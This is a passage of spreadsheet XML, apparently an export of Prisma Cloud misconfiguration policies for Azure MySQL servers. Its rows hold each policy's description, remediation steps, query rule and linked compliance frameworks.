          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-mysql-flexible-server' AND json.rule = properties.state equal ignore case "Ready" and require_secure_transport.value equal ignore case "ON" and (tls_version.value does not equal ignore case "TLSV1.2" and tls_version.value does not equal ignore case "TLSV1.3" and tls_version.value does not equal ignore case "TLSV1.2,TLSV1.3" and tls_version.value does not equal ignore case "TLSV1.3,TLSV1.2")</t>
        </is>
      </c>
      <c r="AA2312" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2312" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2312" t="inlineStr">
        <is>
          <t>PC-AZR-MYQ-884</t>
        </is>
      </c>
      <c r="AD2312" t="b">
        <v>1</v>
      </c>
      <c r="AE2312" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2312" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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2" t="inlineStr">
        <is>
          <t>9f9f8908-470d-4999-aed4-a4dbec53633c</t>
        </is>
      </c>
      <c r="AI2312" t="inlineStr">
        <is>
          <t>51c48dcb-48ad-45b8-bf42-10248daf9a62</t>
        </is>
      </c>
      <c r="AJ2312" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2312" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2313">
      <c r="A2313" t="inlineStr"/>
      <c r="B2313" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2313" s="2" t="inlineStr"/>
      <c r="D2313" t="inlineStr"/>
      <c r="E2313" t="inlineStr"/>
      <c r="F2313" t="inlineStr"/>
      <c r="G2313" t="b">
        <v>1</v>
      </c>
      <c r="H23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13" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2313" t="inlineStr">
        <is>
          <t>azure-mysql-flexible</t>
        </is>
      </c>
      <c r="K2313" t="inlineStr">
        <is>
          <t>Azure Database for MySQL flexible server firewall rule allow access to all IPv4 address</t>
        </is>
      </c>
      <c r="L2313" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2313" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2313" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2313" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2313" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2313" t="inlineStr"/>
      <c r="R2313" t="inlineStr"/>
      <c r="S2313" t="inlineStr"/>
      <c r="T2313" t="b">
        <v>0</v>
      </c>
      <c r="U2313" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2313" t="inlineStr">
        <is>
          <t>azure-mysql-flexible-server</t>
        </is>
      </c>
      <c r="W2313" t="inlineStr">
        <is>
          <t>This policy identifies Azure Database for MySQL flexible servers which have firewall rule allowing access to all IPV4 address.
MySQL server having a firewall rule with start IP being 0.0.0.0 and end IP being 255.255.255.255 (i.e. all IPv4 addresses) would allow access to server from any host on the internet. Allowing access to all IPv4 addresses expands the potential attack surface and exposes the MySQL server to increased threats.
As a best security practice, it is recommended to configure the MySQL servers with restricted IP-based server-level firewall rules so that servers are accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2313" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to Azure Database for MySQL flexible servers dashboard
3. Click on reported MySQL server
4. Under 'Settings', click on 'Networking'.
5. Under 'Firewall rules' section, delete the rule which has 'Start IP' as 0.0.0.0 and 'End IP' as 255.255.255.255. Add specific IPs as per your business requirement.
6. Click on 'Save'
NOTE: These settings take effect immediately after they're applied. You might experience connection loss if you don't meet the requirements for each setting.</t>
        </is>
      </c>
      <c r="Y2313" t="inlineStr"/>
      <c r="Z2313" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-mysql-flexible-server' AND json.rule = properties.state equal ignore case Ready and properties.network.publicNetworkAccess equal ignore case Enabled and firewallRules[?any(properties.startIpAddress equals 0.0.0.0 and properties.endIpAddress equals 255.255.255.255)] exists</t>
        </is>
      </c>
      <c r="AA2313" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2313" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2313" t="inlineStr">
        <is>
          <t>PC-AZR-MYQ-772</t>
        </is>
      </c>
      <c r="AD2313" t="b">
        <v>1</v>
      </c>
      <c r="AE2313" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2313" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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13" t="inlineStr">
        <is>
          <t>5e6b9fac-589e-4c3d-9bac-d92191bdcb32</t>
        </is>
      </c>
      <c r="AI2313" t="inlineStr">
        <is>
          <t>f0fa2439-14c9-4c84-9bb3-0699fe9d0914</t>
        </is>
      </c>
      <c r="AJ2313" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2313" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2314">
      <c r="A2314" t="inlineStr">
        <is>
          <t>NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, TX-RAMP Level 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2314" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2314" s="2" t="inlineStr"/>
      <c r="D2314" t="inlineStr"/>
      <c r="E2314" t="inlineStr"/>
      <c r="F2314" t="inlineStr"/>
      <c r="G2314" t="b">
        <v>1</v>
      </c>
      <c r="H23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14" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2314" t="inlineStr">
        <is>
          <t>azure-mysql-flexible</t>
        </is>
      </c>
      <c r="K2314" t="inlineStr">
        <is>
          <t>Azure Database for MySQL flexible server public network access setting is enabled</t>
        </is>
      </c>
      <c r="L2314" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2314" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2314" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2314" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2314" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2314" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R2314" t="inlineStr">
        <is>
          <t>AC-17-04 : Remote Access | Privileged Commands and Access</t>
        </is>
      </c>
      <c r="S2314" t="inlineStr"/>
      <c r="T2314" t="b">
        <v>0</v>
      </c>
      <c r="U2314" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2314" t="inlineStr">
        <is>
          <t>azure-mysql-flexible-server</t>
        </is>
      </c>
      <c r="W2314" t="inlineStr">
        <is>
          <t>This policy identifies Azure Database for MySQL flexible servers which have public network access setting enabled.
Publicly accessible MySQL servers are vulnerable to external threats with risk of unauthorized access or may remotely exploit any vulnerabilities.
As a best security practice, it is recommended to configure the MySQL servers with IP-based strict server-level firewall rules or virtual-network rules or private endpoints so that servers are accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2314" t="inlineStr">
        <is>
          <t>To configure IP-based strict server-level firewall rules on your MySQL server, follow below URL:
https://learn.microsoft.com/en-gb/azure/mysql/flexible-server/how-to-manage-firewall-portal
To configure virtual-network rules on your MySQL server, follow below URL:
https://learn.microsoft.com/en-gb/azure/mysql/flexible-server/how-to-manage-virtual-network-portal
To configure private endpoints on your MySQL server, follow below URL:
https://learn.microsoft.com/en-gb/azure/mysql/flexible-server/how-to-networking-private-link-portal
NOTE: These settings take effect immediately after they're applied. You might experience connection loss if you don't meet the requirements for each setting.</t>
        </is>
      </c>
      <c r="Y2314" t="inlineStr"/>
      <c r="Z2314" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-mysql-flexible-server' AND json.rule = properties.state equal ignore case Ready and firewallRules[*] is empty and properties.network.publicNetworkAccess equal ignore case Enabled</t>
        </is>
      </c>
      <c r="AA2314" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2314" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2314" t="inlineStr">
        <is>
          <t>PC-AZR-MYQ-763</t>
        </is>
      </c>
      <c r="AD2314" t="b">
        <v>1</v>
      </c>
      <c r="AE2314" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2314" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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14" t="inlineStr">
        <is>
          <t>3deec0a7-431f-4b8a-b722-b0a38bf3670e</t>
        </is>
      </c>
      <c r="AI2314" t="inlineStr">
        <is>
          <t>c0d988dd-3420-45fa-ac78-201900b93f32</t>
        </is>
      </c>
      <c r="AJ2314" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2314" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2315">
      <c r="A2315" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, DORA, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), SOC 2, Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2315" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2315" s="2" t="inlineStr"/>
      <c r="D2315" t="inlineStr"/>
      <c r="E2315" t="inlineStr"/>
      <c r="F2315" t="inlineStr"/>
      <c r="G2315" t="b">
        <v>1</v>
      </c>
      <c r="H23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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2315" t="inlineStr">
        <is>
          <t>azure-mysql-flexible</t>
        </is>
      </c>
      <c r="K2315" t="inlineStr">
        <is>
          <t>Azure MySQL database flexible server SSL enforcement is disabled</t>
        </is>
      </c>
      <c r="L2315" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2315" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2315" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2315" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2315" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2315" t="inlineStr">
        <is>
          <t>Cryptographic Protections</t>
        </is>
      </c>
      <c r="R2315" t="inlineStr">
        <is>
          <t>CRY-03:Transmission Confidentiality</t>
        </is>
      </c>
      <c r="S2315" t="inlineStr"/>
      <c r="T2315" t="b">
        <v>1</v>
      </c>
      <c r="U2315" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2315" t="inlineStr">
        <is>
          <t>azure-mysql-flexible-server</t>
        </is>
      </c>
      <c r="W2315" t="inlineStr">
        <is>
          <t>This policy identifies Azure MySQL database flexible servers for which the SSL enforcement is disabled. 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is>
      </c>
      <c r="X2315" t="inlineStr">
        <is>
          <t>To enable MySQL database flexible server SSL connection, refer below URL:
https://docs.microsoft.com/en-us/azure/mysql/flexible-server/how-to-connect-tls-ssl</t>
        </is>
      </c>
      <c r="Y2315" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.DBforMySQL/flexibleServers/configurations/write' permission. Successful execution will enable SSL connection on your Azure MySQL database flexible server.",
'impact': 'Enables MySQL database flexible server SSL enforcement',
'cliScriptTemplate': 'az mysql flexible-server parameter set --server-name $resourceName --resource-group $resourceGroup --name require_secure_transport --value ON'</t>
        </is>
      </c>
      <c r="Z2315" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-mysql-flexible-server' AND json.rule = properties.state equal ignore case "Ready" and require_secure_transport.value equal ignore case "OFF"</t>
        </is>
      </c>
      <c r="AA2315" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2315" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2315" t="inlineStr">
        <is>
          <t>PC-AZR-MYQ-891</t>
        </is>
      </c>
      <c r="AD2315" t="b">
        <v>1</v>
      </c>
      <c r="AE2315" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2315" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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5" t="inlineStr">
        <is>
          <t>7d3a72d0-b99c-4007-ae56-caa379a140bb</t>
        </is>
      </c>
      <c r="AI2315" t="inlineStr">
        <is>
          <t>50ba3795-c6c7-43f2-af00-5162cb1a14f3</t>
        </is>
      </c>
      <c r="AJ2315" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2315" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2316">
      <c r="A2316" t="inlineStr">
        <is>
          <t>HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27001:2022, CSA CCM v.4.0.6, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, DORA, Copy of New Zealand Information Security Manual (NZISM v3.4), ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, ISO 27002:2022, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CIS Controls v7.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CSA CCM v4.0.12, kashan ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, FFIEC, Copy of CIS Controls v8, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), Australian Cyber Security Centre (ACSC) Essential Eight, RBI Baseline Cyber Security and Resilience Requirements, kfirdaus AWS Account-CS, HIPAA, CSA CCM v.4.0.6, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8.1, PCI DSS v4.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2316" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2316" s="2" t="inlineStr"/>
      <c r="D2316" t="inlineStr"/>
      <c r="E2316" t="inlineStr"/>
      <c r="F2316" t="inlineStr"/>
      <c r="G2316" t="b">
        <v>1</v>
      </c>
      <c r="H23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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2316" t="inlineStr">
        <is>
          <t>azure-mysql-server</t>
        </is>
      </c>
      <c r="K2316" t="inlineStr">
        <is>
          <t>Azure MySQL Database Server using insecure TLS version</t>
        </is>
      </c>
      <c r="L2316" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2316" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2316" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2316" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2316" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2316" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2316" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S2316" t="inlineStr"/>
      <c r="T2316" t="b">
        <v>0</v>
      </c>
      <c r="U2316" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2316" t="inlineStr">
        <is>
          <t>azure-mysql-server</t>
        </is>
      </c>
      <c r="W2316" t="inlineStr">
        <is>
          <t>This policy identifies Azure MySQL Database Servers which are using insecure TLS version. As a security best practice, use the newer TLS version as the minimum TLS version for Azure MySQL Database Server. Currently, Azure MySQL Database Server supports TLS 1.2 version which resolves the security gap from its preceding versions.
https://docs.microsoft.com/en-gb/azure/mysql/howto-tls-configurations</t>
        </is>
      </c>
      <c r="X2316" t="inlineStr">
        <is>
          <t>To configure TLS settings on reported Azure MySQL Database Server, follow the below-mentioned URL:
https://docs.microsoft.com/en-gb/azure/mysql/howto-tls-configurations</t>
        </is>
      </c>
      <c r="Y2316" t="inlineStr"/>
      <c r="Z2316" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-mysql-server' AND json.rule = properties.sslEnforcement equals Enabled and properties.minimalTlsVersion does not equal TLS1_2</t>
        </is>
      </c>
      <c r="AA2316" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2316" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2316" t="inlineStr">
        <is>
          <t>PC-AZR-MYQ-747</t>
        </is>
      </c>
      <c r="AD2316" t="b">
        <v>1</v>
      </c>
      <c r="AE2316" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2316" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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6" t="inlineStr">
        <is>
          <t>c74d4a41-e083-4fb3-9b34-afc329fa3591</t>
        </is>
      </c>
      <c r="AI2316" t="inlineStr">
        <is>
          <t>6d331c22-2044-4ea0-9c52-a79215c9959a</t>
        </is>
      </c>
      <c r="AJ2316" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2316" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2317">
      <c r="A2317" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27002:2013, CIS v1.3.0 (Azure), Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v1.1 (Azure), NIST 800-53 Rev 5, NIST CSF, FFIEC, ITSG-33, CIS v1.4.0 (Azure), CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ISO/IEC 27002:2013, Azure Security Benchmark (v3), NIST SP 800-171 Revision 2, CIS Controls v7.1, CRI Profile v1.2.1, CIS v1.3.1 (Azure), ISO 27002:2022, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, PCI DSS v4.0, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, NIST 800-53 Rev4, ISO/IEC 27018:2019, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, CIS v2.1.0 (Azure) Level 1, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, CRI Profile v2.0, HIPAA, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS Controls v8, CyberSecurity Law of the People's Republic of China, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, CIS v1.2.0 (Azure), Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v2), CSA CCM v.4.0.1, CIS v1.5.0 (Azure) - Level 1, PCI DSS v4.0, CIS v2.0.0 (Azure) Level 1</t>
        </is>
      </c>
      <c r="B2317" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2317" s="2" t="inlineStr"/>
      <c r="D2317" t="inlineStr"/>
      <c r="E2317" t="inlineStr"/>
      <c r="F2317" t="inlineStr"/>
      <c r="G2317" t="b">
        <v>1</v>
      </c>
      <c r="H23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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2317" t="inlineStr">
        <is>
          <t>azure-mysql-server</t>
        </is>
      </c>
      <c r="K2317" t="inlineStr">
        <is>
          <t>Azure MySQL Database Server SSL connection is disabled</t>
        </is>
      </c>
      <c r="L2317" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2317" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2317" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2317" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2317" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2317" t="inlineStr">
        <is>
          <t>Database Services</t>
        </is>
      </c>
      <c r="R2317" t="inlineStr">
        <is>
          <t>4.4.1</t>
        </is>
      </c>
      <c r="S2317" t="inlineStr"/>
      <c r="T2317" t="b">
        <v>0</v>
      </c>
      <c r="U2317" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2317" t="inlineStr">
        <is>
          <t>azure-mysql-server</t>
        </is>
      </c>
      <c r="W2317" t="inlineStr">
        <is>
          <t>This policy identifies Azure MYSQL database server for which the SSL connection is disabled. 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is>
      </c>
      <c r="X2317" t="inlineStr">
        <is>
          <t>1. Login to Azure portal.
2. Navigate to 'Azure Database for MySQL server'
3. Click on the reported database, select 'Connection security' from left panel
4. In 'SSL settings' section,
5. Ensure 'Enforce SSL connection' is set to 'ENABLED'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-9
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-9</t>
        </is>
      </c>
      <c r="Y2317" t="inlineStr"/>
      <c r="Z2317" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-mysql-server' AND json.rule = 'properties.sslEnforcement does not equal Enabled'
{"category":"Networking","resourceTypes":["azurerm_mysql_server"]}</t>
        </is>
      </c>
      <c r="AA2317" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2317" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2317" t="inlineStr">
        <is>
          <t>PC-AZR-MYQ-514-CKV_AZURE_28</t>
        </is>
      </c>
      <c r="AD2317" t="b">
        <v>1</v>
      </c>
      <c r="AE2317" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2317" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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7" t="inlineStr">
        <is>
          <t>cc96a6d0-3251-4bf9-aaa4-349c34810721</t>
        </is>
      </c>
      <c r="AI2317" t="inlineStr">
        <is>
          <t>cf375c15-dee3-46a7-8b2e-def63bf0a473</t>
        </is>
      </c>
      <c r="AJ2317" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2317" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2318">
      <c r="A2318" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2318" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2318" s="2" t="inlineStr"/>
      <c r="D2318" t="inlineStr"/>
      <c r="E2318" t="inlineStr"/>
      <c r="F2318" t="inlineStr"/>
      <c r="G2318" t="b">
        <v>1</v>
      </c>
      <c r="H23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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2318" t="inlineStr">
        <is>
          <t>azure-mysql-server</t>
        </is>
      </c>
      <c r="K2318" t="inlineStr">
        <is>
          <t>Azure Database for MySQL server not configured with private endpoint</t>
        </is>
      </c>
      <c r="L2318" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2318" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2318" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2318" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2318" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2318" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2318" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S2318" t="inlineStr"/>
      <c r="T2318" t="b">
        <v>0</v>
      </c>
      <c r="U2318" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2318" t="inlineStr">
        <is>
          <t>azure-mysql-server</t>
        </is>
      </c>
      <c r="W2318" t="inlineStr">
        <is>
          <t>This policy identifies Azure MySQL database servers that are not configured with private endpoint. Private endpoint connections enforce secure communication by enabling private connectivity to Azure Database for MySQL. Configuring a private endpoint enables access to traffic coming from only known networks and prevents access from malicious or unknown IP addresses which includes IP addresses within Azure. It is recommended to create private endpoint for secure communication for your Azure MySQL database.</t>
        </is>
      </c>
      <c r="X2318" t="inlineStr">
        <is>
          <t>1. Login to Azure portal.
2. Navigate to 'Azure Database for MySQL servers'
3. Click on the reported MySQL server instance you want to modify 
4. Select 'Networking' under 'Settings' from left panel 
5. Under 'Private endpoint', click on Add private endpoint' to create a add add a private endpoint
Refer to below link for step by step process:
https://learn.microsoft.com/en-us/azure/mysql/single-server/how-to-configure-private-link-cli 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-44
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-44</t>
        </is>
      </c>
      <c r="Y2318" t="inlineStr"/>
      <c r="Z2318" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-mysql-server' AND json.rule = properties.userVisibleState equal ignore case Ready and properties.privateEndpointConnections[*] is empty
{"category":"General","resourceTypes":["azurerm_mysql_server"]}</t>
        </is>
      </c>
      <c r="AA2318" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2318" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2318" t="inlineStr">
        <is>
          <t>PC-AZR-MYQ-1067-CKV2_AZURE_44</t>
        </is>
      </c>
      <c r="AD2318" t="b">
        <v>1</v>
      </c>
      <c r="AE2318" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2318" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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8" t="inlineStr">
        <is>
          <t>19c4d9f1-a1fd-4e53-a3ca-4eedc720ec36</t>
        </is>
      </c>
      <c r="AI2318" t="inlineStr">
        <is>
          <t>bd6e2410-2f98-4d6d-a24d-7484c0407113</t>
        </is>
      </c>
      <c r="AJ2318" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2318" t="inlineStr">
        <is>
